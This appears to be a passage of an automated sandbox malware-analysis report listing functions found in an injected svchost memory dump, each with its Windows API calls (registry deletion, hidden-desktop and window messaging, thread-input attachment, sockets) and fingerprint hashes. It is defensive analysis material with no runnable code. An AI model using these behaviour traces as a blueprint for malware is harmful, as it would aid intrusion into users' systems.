                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541ED70D40218AFDB50DFA8D494AEEBBF5EF88704F64856EE515E7200E774AA408F91
                                                                                                                                                                                                                Function 02BB13B0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB13DE
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB141A
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB1446
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB146D
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BB1498
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 7cf2b6275c89a8345453d2cf863cfa11443b88357e9a03cb164ba124eafc32f2
                                                                                                                                                                                                                • Instruction ID: 4c17c130b265cbd2886f921367a5e7b1fe1dfda08f120123e33cb2aa0ddcda20
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cf2b6275c89a8345453d2cf863cfa11443b88357e9a03cb164ba124eafc32f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D731CAB1D10209AFDB40DFA8D884AEEBBF9FF4C314F50856AE918E3200E37499418F90
                                                                                                                                                                                                                Function 02BD51F0 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,02BC369B,00000000,00010108,?,00000000), ref: 02BD522F
                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02BD5264
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BD528E
                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(00000104,02BC369B), ref: 02BD52A6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BD52B2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                • Opcode ID: b4f668a659048f21157d4c8b8494ba75ef92a0b835b7e300bfda2ba29680f70c
                                                                                                                                                                                                                • Instruction ID: 847378e8d2e8e4c81ed1ed1ac44c0e094a47d83de2c107671b6735880426f8d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f668a659048f21157d4c8b8494ba75ef92a0b835b7e300bfda2ba29680f70c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A21C836A40219ABC730DAA8DC44FEAB7BCEB44750F444595FD80EB240E6B0AE548BD0
                                                                                                                                                                                                                Function 02BB18B0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2377537114-0
                                                                                                                                                                                                                • Opcode ID: 4691f0915c366cd04e191a62b28da9bd4f65198954f3797982a865e3d65c2ab0
                                                                                                                                                                                                                • Instruction ID: 45e2ff64a7ebbb82d318c23d07de6c8b9f628a28bc6deaf585b51d9442d4cad2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4691f0915c366cd04e191a62b28da9bd4f65198954f3797982a865e3d65c2ab0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D21A3B0A102099FD724DF5DD894BAABBF4FF49344F20896CDA8AC3300D7B1A561CB90
                                                                                                                                                                                                                Function 02BCAA20 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,7556F380,?,?,02BC0AA8,?), ref: 02BCAA37
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02BC0AA8,?), ref: 02BCAA54
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BC0AA8,?), ref: 02BCAA5B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCAA6B
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,?,02BC0AA8,?), ref: 02BCAA88
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 913929354-0
                                                                                                                                                                                                                • Opcode ID: 9d0acf32afe447b8f3f403df49ee879d2881748c56e748c45087dec0916aeed2
                                                                                                                                                                                                                • Instruction ID: 074d64bc1903941ca2ddf452b2abdb3c4baf9203cb1065488fea8beb59339597
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d0acf32afe447b8f3f403df49ee879d2881748c56e748c45087dec0916aeed2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F018F726422267BE6314DA99C48FA77F5CDF46BF0F650354BA24EA1C4DB60E900C6F4
                                                                                                                                                                                                                Function 02BB6BB9 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3057210225-0
                                                                                                                                                                                                                • Opcode ID: 5b6dffc0091df58dfdaa6cfb625830f61b6dbe2aea705605e0724a1254d195ef
                                                                                                                                                                                                                • Instruction ID: 8c64cddd747798962dd52f2ab085f23a808510fb163e4d7ced43e0cde33227a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6dffc0091df58dfdaa6cfb625830f61b6dbe2aea705605e0724a1254d195ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE11E171E412585BE72797349D4ABEA376CEF08704F0009E8EB89D3180D7F08D948B91
                                                                                                                                                                                                                Function 02BBD230 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000), ref: 02BBD242
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02BBD259
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BBD26F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BBD280
                                                                                                                                                                                                                • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02BBD297
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1270303404-0
                                                                                                                                                                                                                • Opcode ID: 19af8b8f19db094c32ef9398aeeb80a29694cfdbef6d33dabd457ec4cba11017
                                                                                                                                                                                                                • Instruction ID: 6cabf42b3b44b32cbc06daf427477132f02397d9518f7fca14231668187d59b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19af8b8f19db094c32ef9398aeeb80a29694cfdbef6d33dabd457ec4cba11017
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A016935E81218BBE7209B94DD09FEE7B6CEF05B41F804684FB41A60C0D7F49A948BA5
                                                                                                                                                                                                                Function 02BBE380 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,?,00000000,75573080,?,02BB922C,?,00000006,00000000), ref: 02BBE38C
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BBE3A3
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BBE3A6
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000006,?,02BB922C), ref: 02BBE3BD
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02BBE3C2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3855296974-0
                                                                                                                                                                                                                • Opcode ID: b04097a1a038360c9dc744a78c600bb046bd224bb95f00455d0ec92d2f9809f8
                                                                                                                                                                                                                • Instruction ID: 8250f286c82e90cc20d4e9cfc4a2dc18a300c2992411abdc38f77cd635c348dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b04097a1a038360c9dc744a78c600bb046bd224bb95f00455d0ec92d2f9809f8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F01276A412187BD7319B69EC88EAFB79CDB887A0F418515FE0197390D6B0ED108BB0
                                                                                                                                                                                                                Function 02BBD2B0 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                                • SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2643679612-0
                                                                                                                                                                                                                • Opcode ID: 70b10d44adb67a164d65d49c246a28f6a88d13d77aba1ca7bcb1a01127ad0fa0
                                                                                                                                                                                                                • Instruction ID: 5e1d1d8c046da1a91c7ec4d4bbd33a2ea14526ae2135bacf49eaa46c61bc5c9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70b10d44adb67a164d65d49c246a28f6a88d13d77aba1ca7bcb1a01127ad0fa0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F037726412047FE3205B65EC8DFABBF6CEB497A1F544415FB05D7241C57198108770
                                                                                                                                                                                                                Function 02BBE340 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBE34A
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBE352
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE364
                                                                                                                                                                                                                • GetFocus.USER32 ref: 02BBE366
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE373
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 968181190-0
                                                                                                                                                                                                                • Opcode ID: dfb72236e084014cf5604db4d77c8892c11f1ec779aed610867de115e16e34cd
                                                                                                                                                                                                                • Instruction ID: d4447a4d103765cbf5bd8116566e0bcf459c4355632dd22e962f844121aeb4f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfb72236e084014cf5604db4d77c8892c11f1ec779aed610867de115e16e34cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E09271E40308BBD62097A6AC4DFABBFACEB857A2F940455FB08D3240D5719C1087B4
                                                                                                                                                                                                                Function 02BE41D0 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                • Opcode ID: e0c5b0a50b97dcbe6f36943075598fafebcf716320aa19ca434bf4acb8713c3e
                                                                                                                                                                                                                • Instruction ID: 778b95d2c7d046246308fb585423397a41f60f0dbdac0ee0657c8f031cf9f003
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0c5b0a50b97dcbe6f36943075598fafebcf716320aa19ca434bf4acb8713c3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11014CA2A517815BDF30DFA9989141BBBF5EE4410835988BED1DB87A04D331F8889B12
                                                                                                                                                                                                                Function 02BE13A0 Relevance: 6.3, APIs: 4, Instructions: 287COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02BE13F9
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02BE1405
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02BE14AC
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02BE14B8
                                                                                                                                                                                                                  • Part of subcall function 02BE0EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02BE0F50
                                                                                                                                                                                                                  • Part of subcall function 02BE0EA0: closesocket.WS2_32(?), ref: 02BE0F6D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 403730927-0
                                                                                                                                                                                                                • Opcode ID: c02b9f54edc3816e6c19b9a0ded4eddc97be749f865f26db8b865fbe05eacf10
                                                                                                                                                                                                                • Instruction ID: e6dc9d63481d118238cf4757462e9bcda7c168b2002e48101d0cc4a1c13aab02
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c02b9f54edc3816e6c19b9a0ded4eddc97be749f865f26db8b865fbe05eacf10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75B1B372E146068FCF08CF68D990AE537A6EF84341F1985B9ED0E9F346D774A911CBA0
                                                                                                                                                                                                                Function 02BC8220 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: fwrite$fseek
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3883414211-0
                                                                                                                                                                                                                • Opcode ID: 4e3adf7ae27ea3783be0a9909eacad6eb5c3e3c863427851cb20aa436f6cff17
                                                                                                                                                                                                                • Instruction ID: 8e823667cba240332e488fd528babdcb7d6d36537d6df364f98927347409b1d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e3adf7ae27ea3783be0a9909eacad6eb5c3e3c863427851cb20aa436f6cff17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F421D0B0A407059FD720CFA8CC41BAEBBF5EF98300F14896DE585E7385E2B4A944CB90
                                                                                                                                                                                                                Function 02BC2370 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC2392
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 02BC239E
                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000104), ref: 02BC23B5
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02BC23D6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ParentTextWindowmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4175915554-0
                                                                                                                                                                                                                • Opcode ID: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                                • Instruction ID: 257395ed3f623d7a43c3eb77de86609f8cf3c78d6f45bc289a34343a1f2b1c4a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2401F573B403246BD7209A6DAC88AA7B36DEB40555F5082BAFF49E3201EA70D95487E0
                                                                                                                                                                                                                Function 02BB4090 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02BB432B,?), ref: 02BB409C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BB432B,?), ref: 02BB40A3
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB40E2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                                                                                                                • API String ID: 1060465051-3491811756
                                                                                                                                                                                                                • Opcode ID: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                                • Instruction ID: fba483f3abb853bac900456353962cc15e0d9d27534b79def3f5e5b0c31d69ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F081B1940710AFD3B0CF6D9804B66BBE8EF0C651B40892EF69AC7641D23491148BB0
                                                                                                                                                                                                                Function 02BCB890 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000,?,?,02BC8BDE,00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BCB8A0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCB740,00000000,00000000,00000000), ref: 02BCB8B5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02BC0BE3,00000000,?,?,02BC8BDE,00000000), ref: 02BCB8D3
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02BC8BDE,00000000), ref: 02BCB8E4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1825730051-0
                                                                                                                                                                                                                • Opcode ID: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
